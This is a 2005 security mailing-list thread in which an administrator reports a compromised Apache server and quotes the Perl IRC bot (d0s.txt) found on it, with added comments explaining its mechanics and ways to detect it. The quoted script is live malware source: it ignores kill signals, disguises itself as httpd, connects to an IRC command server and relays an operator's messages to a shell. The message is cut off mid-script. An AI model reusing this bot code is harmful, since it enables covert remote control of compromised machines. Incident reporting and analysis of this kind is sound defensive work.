
Re: Apache hacks (./atac, d0s.txt)


From: Daniel Cid <danielcid () yahoo com br>
Date: Sat, 30 Apr 2005 01:48:12 -0300 (ART)

Take a look at these links:

http://lists.virus.org/full-disclosure-0412/msg00541.html

http://seclists.org/lists/fulldisclosure/2005/Jan/0051.html

Are your systems patched (apache) ? Do you run any
application that might be vulnerable?

One thing I know is that this Perl script is clearly
made by some Brazilian people.

--
Daniel B. Cid, CISSP
daniel.cid @ ( at ) gmail.com

 --- Andrew Y Ng <ayn () AndrewNg com> escreveu: 
My server has been seeing some unusual activity
today; I don't have much time
to get down to the bottom of things, but after I
investigated briefly I have
decided to disable PERL executable permission for
www-data (Apache process's
user), also locked /var/tmp so www-data cannot write
to it. 

Looks like it ignores all the `kill` signals, not
sure how I can actually
kill it...


I found the included script in /var/tmp called
d0s.txt.

I found a bunch of processes called ./atac 20
running, and found the
following content in /tmp/atac:

http://andrewng.com/tmp/atac.tbz

here's d0s.txt:

#!/usr/bin/perl
# NOTE(review): this script is quoted from an e-mail whose client re-wrapped
# long lines.  Several box-style trailing comments therefore spill onto the
# next physical line without a leading '#'; those spill-over fragments are
# kept exactly as found.  The '#' comments in this section render the
# original Portuguese comments in English.
################ CONFIGURATION

#################################################################
my $processo = '/usr/local/apache/bin/httpd -DSSL'; 
# Name the process will show under in ps (copied into $0 later)  #

#----------------------------------------------################################################
# Bot user mode ("Modo Do Bot").
my $MODOME='+pi';                               # 
Modo Do Bot                                 #       
           

#----------------------------------------------################################################
# Anti-flood: stop after X lines ("Evita o flood depois de X linhas").
my $linas_max='10';                            #
Evita o flood :) depois de X linhas          #

#----------------------------------------------################################################
# Sleep X seconds ("ele dorme X segundos").
my $sleep='3';                                 # ele
dorme X segundos                         #
##################### IRC

#####################################################################
# Administrator nick(s) ("Nick do administrador").  Only senders whose
# nick matches one of these are honoured by parse().
my @adms=("DDOS");                           # Nick do
administrador                        #

#----------------------------------------------################################################
# Channels ("Canais").
my @canais=("#bots ddos");# Canais                  
                    #

#----------------------------------------------################################################
# Bot nick; if already in use it appears with a random number appended
# ("Caso esteja em uso vai aparecer com numero randomico no final").
my $nick='b0t';                           # Nick do
bot. Caso esteja em uso vai aparecer #
#                                              #
aparecer com numero radonamico no final      #

#----------------------------------------------################################################
# IRC user ID.
my $ircname = 'b0t';                      # User ID 
                                    #

#----------------------------------------------################################################
# IRC "real name" field.
my $realname = '4Admin14: 4#DDOS';     
                               #

#----------------------------------------------################################################
# IRC server used unless one is given on the command line ("Servidor de
# irc que vai ser usado caso nao seja especificado no argumento").
# $servidor is a package global: no `my`, and the script has no strict.
$servidor='irc.gigachat.net' unless $servidor; #
Servidor de irc que vai ser usado            #
#                                              #
caso não seja especificado no argumento      #

#----------------------------------------------################################################
# IRC server port ("Porta do servidor de irc").
my $porta='6667';                            # Porta do
servidor de irc                     #
################ SHELL ACCESS

###############################################################
# 1/0 enables/disables shell access ("pra habilita/desabilita acesso
# a shell").
my $secv = 1;                                # 1/0
pra habilita/desabilita acesso a shell   #

###############################################################################################

my $VERSAO = '1.0';

# Signal handling: INT, HUP and TERM are ignored, so Ctrl-C and a plain
# `kill <pid>` (SIGTERM) have no effect -- this matches the "ignores all
# the kill signals" observation earlier in the thread.  SIGKILL
# (`kill -9`) and SIGSTOP cannot be caught or ignored, so they still work.
# CHLD is ignored so forked children are reaped automatically.  'PS' is
# not a standard signal name; under `use warnings` Perl would report it
# as an unknown signal.
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';

use IO::Socket;
use Socket;
use IO::Select;
# Backgrounding and process-name spoofing.
chdir("/");                        # leave the launch directory (the thread reports /var/tmp)
$servidor="$ARGV[0]" if $ARGV[0];  # first command-line argument overrides the built-in server
# $0 is what `ps` prints as the command line; overwriting it with the fake
# httpd string, NUL-padded, hides the real `perl <script>` invocation.
# On Linux, /proc/<pid>/exe still resolves to the perl interpreter, so
# comparing that link with the claimed command line exposes the process.
# The doubled ';;' is just an empty statement.
$0="$processo"."\0"x16;;
# Fork-and-exit: the parent returns to the caller at once, the child keeps
# running.  There is no setsid, so the child stays in the parent's session.
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);



# Global connection state.  %irc_servers is keyed by the stringified
# socket and filled in by conectar() (host, porta, nick, meuip); the main
# loop treats an empty hash as "not connected" and reconnects.
our %irc_servers;
our %DCC;
# Unusual mix of indirect-object `new` and an arrow call; $dcc_sel is not
# referenced anywhere in the visible part of the script.
my $dcc_sel = new IO::Select->new();


# Select set holding the live IRC socket(s).  Undeclared package global
# (the script has no `use strict`); written by conectar(), read by the
# main loop.
$sel_cliente = IO::Select->new();
# Writes one raw protocol line (newline appended) to an IRC socket.
# Two-arg form: sendraw($socket, $text).  One-arg form: sendraw($text),
# which goes to the global $IRC_cur_socket set by conectar() and by the
# main read loop.
sub sendraw {
  # $#_ is the last index of @_, so '1' means exactly two arguments
  # (numeric ==, the string '1' is coerced to a number).
  if ($#_ == '1') {
    my $socket = $_[0];
    print $socket "$_[1]\n";
  } else {
      print $IRC_cur_socket "$_[0]\n";
  }
}

# Opens a TCP connection to one IRC server and registers the bot on it.
# Args (positional): nick, server host, server port.
# Returns 1 when the connect fails; the main loop then simply calls it
# again, so a dead or blocked server produces a tight stream of repeated
# connection attempts -- a useful network-side indicator.
sub conectar {
   my $meunick = $_[0];
   my $servidor_con = $_[1];
   my $porta_con = $_[2];

   my $IRC_socket =
IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or
return(1);
   # Because of the `or return(1)` above, this test is always true here.
   if (defined($IRC_socket)) {
     # Global "current socket" used by sendraw() when called with one arg.
     $IRC_cur_socket = $IRC_socket;

     $IRC_socket->autoflush(1);
     $sel_cliente->add($IRC_socket);

     # Per-connection state, keyed by the stringified socket.
     $irc_servers{$IRC_cur_socket}{'host'} =
"$servidor_con";
     $irc_servers{$IRC_cur_socket}{'porta'} =
"$porta_con";
     $irc_servers{$IRC_cur_socket}{'nick'} =
$meunick;
     $irc_servers{$IRC_cur_socket}{'meuip'} =
$IRC_socket->sockhost;
     # nick() is defined outside the visible portion of the script.
     nick("$meunick");
     # NOTE(review): as quoted, this string literal spans three physical
     # lines because the mail client wrapped it; in the original file it
     # was presumably a single IRC USER registration line.
     sendraw("USER $ircname
".$IRC_socket->sockhost." $servidor_con
:$realname");
     sleep 1;
   }

}
# Carries an incomplete trailing line from one read to the next.
my $line_temp;
# Main event loop; never exits (all termination signals are ignored above).
while( 1 ) {
   # Not connected to any server: keep trying.  conectar() returns
   # immediately on failure and there is no delay here, so an unreachable
   # server makes this spin, generating continuous connect attempts.
   while (!(keys(%irc_servers))) { conectar("$nick",
"$servidor", "$porta"); }
   delete($irc_servers{''}) if
(defined($irc_servers{''}));
   # Defined outside the visible portion.  The `&name;` call form passes
   # the caller's current @_ through.
   &DCC::connections;
   # Zero-timeout poll plus `next` means this loop busy-waits while idle.
   my @ready = $sel_cliente->can_read(0);
   next unless(@ready);
   foreach $fh (@ready) {
     # Globals read elsewhere (sendraw(), parse()).
     $IRC_cur_socket = $fh;
     $meunick =
$irc_servers{$IRC_cur_socket}{'nick'};
     $nread = sysread($fh, $msg, 4096);
     # Peer closed the connection: drop it so the outer loop reconnects.
     if ($nread == 0) {
        $sel_cliente->remove($fh);
        $fh->close;
        delete($irc_servers{$fh});
     }
     @lines = split (/\n/, $msg);

     # Reassemble protocol lines across reads: a partial last line is held
     # in $line_temp and prefixed to the first line of the next read.
     for(my $c=0; $c<= $#lines; $c++) {
       $line = $lines[$c];
       $line=$line_temp.$line if ($line_temp);
       $line_temp='';
       $line =~ s/\r$//;
       unless ($c == $#lines) {
         parse("$line");
       } else {
           # Last fragment of this read: treat it as complete only if it
           # is the sole line, ended in CR, or is a server NOTICE AUTH
           # banner; otherwise keep it for the next read.
           if ($#lines == 0) {
             parse("$line");
           } elsif ($lines[$c] =~ /\r$/) {
               parse("$line");
           } elsif ($line =~ /^(\S+) NOTICE AUTH
:\*\*\*/) {
               parse("$line");
           } else {
               $line_temp = $line;
           }
       }
      }
   }
}


 
sub parse {
   my $servarg = shift;
   if ($servarg =~ /^PING \:(.*)/) {
     sendraw("PONG :$1");
   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)
PRIVMSG (.+?) \:(.+)/) {
       my $pn=$1; my $onde = $4; my $args = $5;
       if ($args =~ /^\001VERSION\001$/) {
         notice("$pn", "\001Bot powered by DDOS
TEAM\001");
       }
       if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
         if ($onde eq "$meunick"){
           shell("$pn", "$args");
         }
         if ($args =~ /^(\Q$meunick\E|\!bot)\s+(.*)/
) {

=== message truncated === 


        
        
                

